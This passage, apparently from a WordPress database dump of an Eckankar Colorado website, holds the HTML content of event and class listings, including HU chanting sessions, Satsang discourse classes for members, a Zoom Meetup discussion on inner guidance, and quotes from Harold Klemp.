singing <strong>HU</strong> yourself:<strong> <em>Inner peace and calm, Divine love, Expanded awareness, Spiritual self-discovery and growth, Healing of the heart</em></strong>.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">After registration, you will receive event login information via email.</p>\n</div>\n<div class=\"col-md-4 col-sm-6 col-xs-12\" style=\"border-width: 1px 0px 0px 1px; border-color: #cccccc;\">\n<p class=\"\" style=\"font-family: Raleway; font-weight: 500; font-size: 18px; color: #1d5791; margin-top: 10px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Register Today!</p>\n<p>[ninja_form id=45]</p>\n<p class=\"\" style=\"margin-top: 0px; font-family: Open Sans; font-weight: 400; color: #1d5791; font-size: 14px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">After registration, you will receive event login information via email.</p>\n</div>\n</div>\n</div>\n</div>','SOS REG --Homepage Promo W/form','','draft','closed','closed','','sos-reg-homepage-promo-w-form','','','2021-04-19 20:49:35','2021-04-20 02:49:35','',0,'https://eckankar-colorado.org/?page_id=264550',0,'page','',0),(264553,2,'2021-04-18 19:51:53','2021-04-19 01:51:53',' ','','','publish','closed','closed','','264553','','','2021-04-18 19:51:53','2021-04-19 01:51:53','',0,'https://eckankar-colorado.org/264553/',35,'nav_menu_item','',0),(264588,2,'2021-04-22 10:57:13','2021-04-22 16:57:13','<p><span style=\"font-size: 20pt; color: #333333;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><span style=\"color: #333333; font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\">After our brief silent contemplation, we will go to Zoom breakout rooms for spiritual conversation. When we come back, we\'ll see a short video from the leader of Eckankar, Harold Klemp.</span></span></p>\r\n<p><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!</span><br />\r\n</strong></span></span>[ninja_form id=44]</p>','Sound of Soul Event - Zoom Online','','publish','closed','closed','','sound-of-soul-zoom-online-template-mec','','','2021-10-18 18:30:26','2021-10-19 00:30:26','',0,'https://eckankar-colorado.org/events/sound-of-soul-zoom-online-template-mec/',0,'mec-events','',0),(264607,0,'2021-04-22 15:30:23','2021-04-22 21:30:23','','','','publish','closed','closed','','264607','','','2021-04-22 15:30:23','2021-04-22 21:30:23','',0,'https://eckankar-colorado.org/nf_sub/264607/',0,'nf_sub','',0),(264608,2,'2021-04-22 15:49:49','2021-04-22 21:49:49','<p><strong><span style=\"font-size: 14pt;\">Would you like to learn spiritual tools that can help you in your daily life?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Are you seeking a balance between taking action to solve your problems and surrendering to the Divine?</strong></span></p>\r\n<p>I<span style=\"font-size: 14pt;\">f you answered yes to either question, this ECK Light &amp; Sound Service will show you how to rise above your problems so that you can view them from a spiritual perspective and gain help from Spirit and the Mahanta (our spiritual guide).<br />\r\n<br />\r\n</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“...Sometimes, however, the problems we face seem beyond our abilities. Here is our opportunity to grow spiritually. Knowing how to work with the ECK, Divine Spirit, helps us overcome the fear of facing something that seems beyond our ability. We live a much more joyful, fulfilling life. Knowing how to strike a balance between doing everything within our power to address a problem and handing it over to the ECK is the secret of problem solving from a spiritual perspective.”</span></p>\r\n<p><span style=\"color: #666666; font-size: 14pt;\">\"Whether the problems we face are financial or health related or spring from a lack of self-discipline, there are spiritual exercises to help us address them.\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em> ECKANKAR--Ancient Wisdom for Today, </em>pp 84-85</span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This service will be in-person at the ECK Temple of Colorado.<br />\r\n</span></p>\r\n<p>**<span style=\"font-size: 12pt;\"><em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>','In-Person ECK Event - ECK Light & Sound Service<br>\'Spiritual Tools for Daily Living\'','','publish','closed','closed','','meetup-online-eventtemplate','','','2021-08-04 09:41:10','2021-08-04 15:41:10','',0,'https://eckankar-colorado.org/events/meetup-online-eventtemplate/',0,'mec-events','',0),(264610,2,'2023-08-31 12:45:39','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp’s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life–there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God’s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-2234-0.html\">ECK Bookstore</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','BOOK DISCUSSION In Person-now called a Spiritual Discussion TEMPLATE | Title Goes Here','','draft','closed','closed','','','','','2023-08-31 12:45:39','2023-08-31 18:45:39','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264610',0,'mec-events','',0),(264611,2,'2021-04-24 13:22:04','2021-04-24 19:22:04','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Satsang Class - \"The Master 2 Discourses\"','','publish','closed','closed','','satsang-class-the-master-2-discourses','','','2021-04-24 13:22:04','2021-04-24 19:22:04','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264611',0,'mec-events','',0),(264612,2,'2021-04-22 17:05:24','2021-04-22 23:05:24','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Satsang Class<br>\"The ECK Satsang Discourses\" – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series','','','2021-04-24 12:04:51','2021-04-24 18:04:51','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264612',0,'mec-events','',0),(264613,0,'2021-04-23 17:47:19','2021-04-23 23:47:19','','','','publish','closed','closed','','264613','','','2021-04-23 17:47:19','2021-04-23 23:47:19','',0,'https://eckankar-colorado.org/nf_sub/264613/',0,'nf_sub','',0),(264615,2,'2021-04-24 11:50:17','2021-04-24 17:50:17','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Satsang Class - \"The Master 4 Discourses\"','','publish','closed','closed','','online-member-class-the-master-4-discourses','','','2021-04-24 12:04:01','2021-04-24 18:04:01','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264615',0,'mec-events','',0),(264617,2,'2021-04-24 12:01:11','2021-04-24 18:01:11','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Satsang Class - \"Soul Travel 2\"','','publish','closed','closed','','933','','','2021-04-24 12:02:48','2021-04-24 18:02:48','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264617',0,'mec-events','',0),(264618,2,'2021-04-24 12:10:23','2021-04-24 18:10:23','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Satsang Class - \"The Secret Way\"','','publish','closed','closed','','299','','','2021-04-24 12:11:43','2021-04-24 18:11:43','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264618',0,'mec-events','',0),(264623,2,'2021-04-24 12:19:09','2021-04-24 18:19:09','<p><span style=\"font-size: 20pt; color: #333333;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><span style=\"color: #333333; font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refre</span>shments and fellowship.</span></p>\r\n<p><a class=\"reg3Button sg-popup-id-264853\" href=\"#\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #685454 !important\">Register Now!</a></p>\r\n\r\n','Experience the Sound Of Soul','','publish','closed','closed','','sound-of-soul-zoom-online-template-mec-977','','','2021-05-04 11:45:04','2021-05-04 17:45:04','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264623',0,'mec-events','',0),(264627,2,'2021-04-24 13:16:41','2021-04-24 19:16:41','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Satsang Class<br>\"The ECK Satsang Discourses\" Third Series','','publish','closed','closed','','921','','','2021-04-24 13:17:52','2021-04-24 19:17:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264627',0,'mec-events','',0),(264630,2,'2021-04-24 13:19:54','2021-04-24 19:19:54','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Satsang Class - \"Soul Travel 1 – The Illuminated Way\"','','publish','closed','closed','','183','','','2021-04-24 13:19:54','2021-04-24 19:19:54','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264630',0,'mec-events','',0),(264632,2,'2021-11-09 14:58:24','2021-11-09 21:58:24','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online ECK Satsang Class<br>\'The Eck Satsang Discourses - Second Series\'','','publish','closed','closed','','satsang-class-the-master-2-discourses-848','','','2021-11-09 14:58:24','2021-11-09 21:58:24','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264632',0,'mec-events','',0),(264633,2,'2021-04-24 13:27:03','2021-04-24 19:27:03','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Boulder Satsang Class - \"The ECK Dream 1 Discourses\"','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-363','','','2021-04-24 13:28:33','2021-04-24 19:28:33','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264633',0,'mec-events','',0),(264635,2,'2021-04-24 13:31:41','2021-04-24 19:31:41','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Satsang Class - \"The Master 2 Discourses\"','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-194','','','2021-04-24 13:31:41','2021-04-24 19:31:41','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264635',0,'mec-events','',0),(264637,2,'2021-04-24 13:35:44','2021-04-24 19:35:44','<p><span style=\"font-size: 16pt; color: #666666; font-family: georgia, palatino, serif;\">“<em>Showers of love rain down upon us simply because we are Soul, a divine spark of God. Its Voice, which showers the love, is the pure Light and Sound…The Light and Sound are God’s way to communicate directly with us. They help develop our creativity, which makes us godlike.</em>” </span><span style=\"font-size: 14pt; color: #666666;\"><span style=\"font-size: 12pt;\"><em>ECK Wisdom on Inner Guidance </em>—Harold Klemp, 6</span><br />\r\n<br />\r\n</span></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 13pt;\">If you’re unhappy, could you open yourself to the possibility that there is something better?<br />\r\n</span></strong><strong><span style=\"font-size: 13pt;\">Have you ever found that your attitude holds the key to whether a problem will be easy or difficult?<br />\r\n</span></strong></span><strong><span style=\"color: #f28a27; font-size: 13pt;\"><span style=\"color: #23507d;\">Would you like to find comfort when facing daily challenges or decisions?</span> <br />\r\n</span></strong></p>\r\n<hr style=\"margin-top: 10px; margin-bottom: 15px; border-top: 3px double #8c8b8b;\" />\r\n<p><span style=\"font-size: 13pt;\">Other Souls just like you have found ways to pay better attention to and discover solutions through inner guidance.</span></p>\r\n<p><span style=\"font-size: 13pt;\">In <em>ECK Wisdom on Inner Guidance</em>, Harold Klemp writes on page 37,</span></p>\r\n<p style=\"padding-left: 40px;\"><span style=\"color: #666666; font-family: georgia, palatino, serif;\"><em><span style=\"font-size: 14pt;\">“Listen to God’s Voice. Respond to it spiritually and know that despite every appearance to the contrary, all is well and in its rightful place.”</span></em></span></p>\r\n<p><span style=\"font-size: 13pt;\">Answers may come to you through an animal, another person, an angel, spiritual guide or master, or straight from the Holy Spirit as Light and Sound.</span></p>\r\n<p><span style=\"font-size: 13pt;\">There are tools to awaken you to the hidden ways God speaks to you if you are willing to open your heart to love.</span></p>\r\n<p><span style=\"font-size: 13pt;\">In this discussion, we’ll discuss learning to listen to inner guidance and consider our next steps in our evolving relationship with divine love to gain greater spiritual freedom. There will be an opportunity to try a brief spiritual exercise to help us.</span></p>\r\n<p><span style=\"font-size: 13pt;\">All are welcome.</span></p>\r\n<p><span style=\"font-size: 13pt;\">The meeting will occur via ZOOM. Please RSVP to get the link.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/Spiritual-Experiences-Group-of-Lone-Tree/events/276858946/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP ONLINE EVENT -  Who Can I Trust When All Else Fails? (An ECKANKAR Perspective)','','publish','closed','closed','','meetup-online-eventtemplate-561','','','2021-04-24 13:36:49','2021-04-24 19:36:49','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264637',0,'mec-events','',0),(264639,2,'2021-04-24 13:45:26','2021-04-24 19:45:26','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Satsang Class - \"The Master 4 Discourses\"','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-545','','','2021-04-24 13:45:26','2021-04-24 19:45:26','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264639',0,'mec-events','',0),(264640,2,'2021-04-24 13:48:35','2021-04-24 19:48:35','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Satsang Class - \"Letters of Light and Sound 1\"','','publish','closed','closed','','satsang-class-the-master-2-discourses-848-339','','','2021-05-09 20:11:52','2021-05-10 02:11:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=264640',0,'mec-events','',0),(264644,2,'2021-04-24 13:55:13','2021-04-24 19:55:13','You can see how this popup was set up in our step-by-step guide: https://wppopupmaker.com/guides/auto-opening-announcement-popups/','Example: Auto-opening announcement popup','','publish','closed','closed','','example-auto-opening-announcement-popup-2','','','2021-04-24 13:55:13','2021-04-24 19:55:13','',0,'https://eckankar-colorado.org/?p=264644',0,'popup','',0),(264648,2,'2021-04-24 14:20:53','2021-04-24 20:20:53','You can see how this popup was set up in our step-by-step guide: https://wppopupmaker.com/guides/auto-opening-announcement-popups/','Example: Auto-opening announcement popup','','publish','closed','closed','','example-auto-opening-announcement-popup-3','','','2021-04-24 14:20:53','2021-04-24 20:20:53','',0,'https://eckankar-colorado.org/?p=264648',0,'popup','',0),(264649,0,'2021-04-26 01:08:21','2021-04-26 07:08:21','','','','publish','closed','closed','','264649','','','2021-04-26 01:08:21','2021-04-26 07:08:21','',0,'https://eckankar-colorado.org/nf_sub/264649/',0,'nf_sub','',0),(264650,2,'2021-04-26 13:53:46','2021-04-26 19:53:46','<p><span style=\"font-size: 18pt; color: #954a00;\">- Are you searching for balance in today’s world?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #954a00; line-height: 0.9;\">- Do you wonder if there is a way to face stressful situations with love rather than fear?</span></p>\r\n<p><span style=\"font-size: 18pt; color: #954a00; line-height: 0.9;\">- Do you have a feeling inside that there is more to life than coping with the challenges of the day?</span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>Spiritually you can shift from coping with the tensions of living to finding a place of inner peace. It is possible to go within and find the answers to anything you face.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">It may be difficult to believe but the answer to every problem you face is already within you. This does not mean that problems disappear. Yet, can give you hope that you will find a solution. You are soul created from love. Put in this world to learn and grow in spiritual stamina. Make the shift from looking at life as a series of problems to seeing it as an opportunity to gain spiritual freedom!</span></p>\r\n<p>&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666;\">“At certain times in your life, things are more up in the air than at other times. When they are, you’re living on the edge. Your nerves are frayed, or sometimes you’re being pushed too fast for what you can do. If you don’t get it done, you wonder, then what? Because you do not know. These are the tensions of living.”</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">“The Holy Spirit is directing each of our lives. It will lead you, and has led you, into the very life and circumstances that you need- the circumstances which spiritually are very good for you.””</span><br />\r\n<span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em> Spiritual Wisdom Journal</em></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 12pt;\">-Quotes by Harold Klemp from the <em>Spiritual Wisdom Journal</em> are referenced below.</span></p>\r\n<p><span style=\"font-size: 12pt;\">All are welcome to join us for this 